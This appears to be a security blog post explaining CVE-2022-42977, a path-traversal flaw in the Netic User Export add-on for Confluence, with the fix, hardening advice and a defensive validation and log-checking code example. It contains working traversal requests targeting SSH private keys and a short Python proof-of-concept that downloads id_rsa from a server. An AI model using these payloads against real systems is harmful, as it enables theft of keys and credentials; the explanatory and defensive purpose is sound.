Confluence is one of the most widely used platforms for team collaboration, and add-ons are often required for various business needs. But sometimes these add-ons accidentally open dangerous holes—exactly what happened with the Netic User Export add-on before version 1.3.5. This post gives you a deep dive into this vulnerability (CVE-2022-42977), showing how a single parameter in a user export feature allowed attackers to download any file on the server—even private SSH keys.
What is the Netic User Export Add-on?
The Netic User Export plug-in lets Confluence admins export user lists for backup, migrations, or compliance. It does this by letting you generate download files—usually CSVs or Excel spreadsheets—containing usernames, emails, and other details.
Like many export tools, you can give your exported file a custom name. This is where things went disastrously wrong.
The Vulnerability: Unvalidated fileName Parameter
The add-on provided an export feature but failed to validate the output filename supplied in the HTTP request. Instead of writing only to a fixed name such as users-export.csv inside a known export directory, the add-on trusted whatever filename the client sent.
How Did It Work?
When sending an export request, the client could specify a fileName parameter. But instead of limiting this parameter to safe, known filenames in a specific directory, the add-on simply opened and served the file as requested. This meant an attacker could change the fileName to reference _any_ file on the Confluence server.
Suppose the add-on's export endpoint looked something like this:
POST /plugins/servlet/netic-user-export/export
Content-Type: application/x-www-form-urlencoded
fileName=users.csv
A normal user gets a file called users.csv, containing the user list.
But an attacker could send:
POST /plugins/servlet/netic-user-export/export
Content-Type: application/x-www-form-urlencoded
fileName=../../../../../../home/confluence/.ssh/id_rsa
Or, on Windows:
fileName=C:\Users\confluence\.ssh\id_rsa
The export feature would see that fileName, open it, and send back the raw file—no questions asked. This could include:
- Private SSH keys
- Password files like /etc/passwd or /etc/shadow
Simple Proof-of-Concept (PoC) Code
Here's a Python snippet showing how to exploit this, given a Confluence server using a vulnerable Netic User Export add-on:
import requests

url = 'https://confluence.example.com/plugins/servlet/netic-user-export/export'
data = {
    'fileName': '../../../../../../home/confluence/.ssh/id_rsa'
}
cookies = {'JSESSIONID': 'YOUR_SESSION_ID'}  # Needs a valid session

response = requests.post(url, data=data, cookies=cookies)
if response.status_code == 200:
    with open('id_rsa', 'wb') as f:
        f.write(response.content)
    print('[+] File downloaded: id_rsa')
else:
    print('[-] Exploit failed:', response.status_code)
You need to be authenticated, but if an attacker can log in as any user, they're in.
- Application: Any Confluence instance running a Netic User Export version before 1.3.5
- Risk: Confidential files accessible to any authenticated user (and in some misconfigs, even anonymous users)
Why is This So Dangerous?
This is a classic case of arbitrary file download. If attackers can download any file accessible to the Confluence server’s OS user, it doesn't matter if your core app is up-to-date and secure.
Worst case? Stealing private keys or database credentials, then using them for full server takeover.
How Was It Fixed?
Version 1.3.5 of the add-on fixed this by adding proper validation and restricting exports to only allowed filenames and directories. If you’re running a version before 1.3.5: update right now.
How To Protect Your Confluence (and all add-ons)
- Audit all export/download features: Look for fileName, path, or similar parameters in any admin or user tool.
- Apply principle of least privilege: The OS user running Confluence should have access only to what's needed.
- Patch add-ons promptly: Not just Confluence itself.
- Monitor logs for weird export requests, especially those requesting files outside the intended export directory.
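The fix described above (restrict exports to an allowed directory and file set) and the log-monitoring advice, as an added Python example that is not the add-on's own code: resolve_export_path rejects every fileName form shown in this post, and suspicious_export_requests applies the same check to request log lines. The export directory, the allowed extensions and the log line format are assumptions made for this example.

```python
import os
import re
from typing import List, Optional

# Assumed export location and formats; the post does not give the add-on's own.
EXPORT_DIR = "/var/atlassian/application-data/confluence/netic-export"
ALLOWED_EXT = {".csv", ".xlsx"}

# Anything that is not a bare file name: a path separator, a NUL byte,
# a Windows drive prefix, or a name that is only dots.
UNSAFE_NAME = re.compile(r"[\\/\x00]|^[A-Za-z]:|^\.+$")


def resolve_export_path(file_name: str, export_dir: str = EXPORT_DIR) -> Optional[str]:
    """Map a client-supplied fileName to a path inside export_dir, or None.

    Rejects both request forms from the post: the '../../../..' traversal
    and the absolute Windows path 'C:\\Users\\confluence\\.ssh\\id_rsa'.
    """
    if not file_name or UNSAFE_NAME.search(file_name):
        return None
    if os.path.splitext(file_name)[1].lower() not in ALLOWED_EXT:
        return None
    # Defence in depth: canonicalise and confirm the result is still inside
    # the export directory, even though the regex already rejected traversal.
    base = os.path.realpath(export_dir)
    candidate = os.path.realpath(os.path.join(base, file_name))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def suspicious_export_requests(log_lines: List[str]) -> List[str]:
    """Return the fileName values of export requests that fail validation.

    Assumed (constructed) log format: each line holds the request path and the
    submitted parameter, e.g. 'POST /plugins/servlet/netic-user-export/export fileName=users.csv'.
    A plain access log does not carry a POST body, so a request-logging filter is assumed.
    """
    flagged = []
    for line in log_lines:
        if "/netic-user-export/export" not in line:
            continue
        match = re.search(r"fileName=(\S+)", line)
        if match and resolve_export_path(match.group(1)) is None:
            flagged.append(match.group(1))
    return flagged
```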
Conclusion
CVE-2022-42977 is a reminder that even simple features like exports can pose huge risks. Always validate parameters, limit file access, and don’t trust user input—even from admins.
If you're maintaining Atlassian Confluence or any similar software, put add-ons through the same scrutiny you apply to core updates. One slip-up, as we saw here, could put your whole server at risk.
References
- CVE-2022-42977 NVD Entry
- Netic User Export on Atlassian Marketplace
- Netic User Export Version History
Timeline
Published on: 11/15/2022 01:15:00 UTC
Last modified on: 08/08/2023 14:22:00 UTC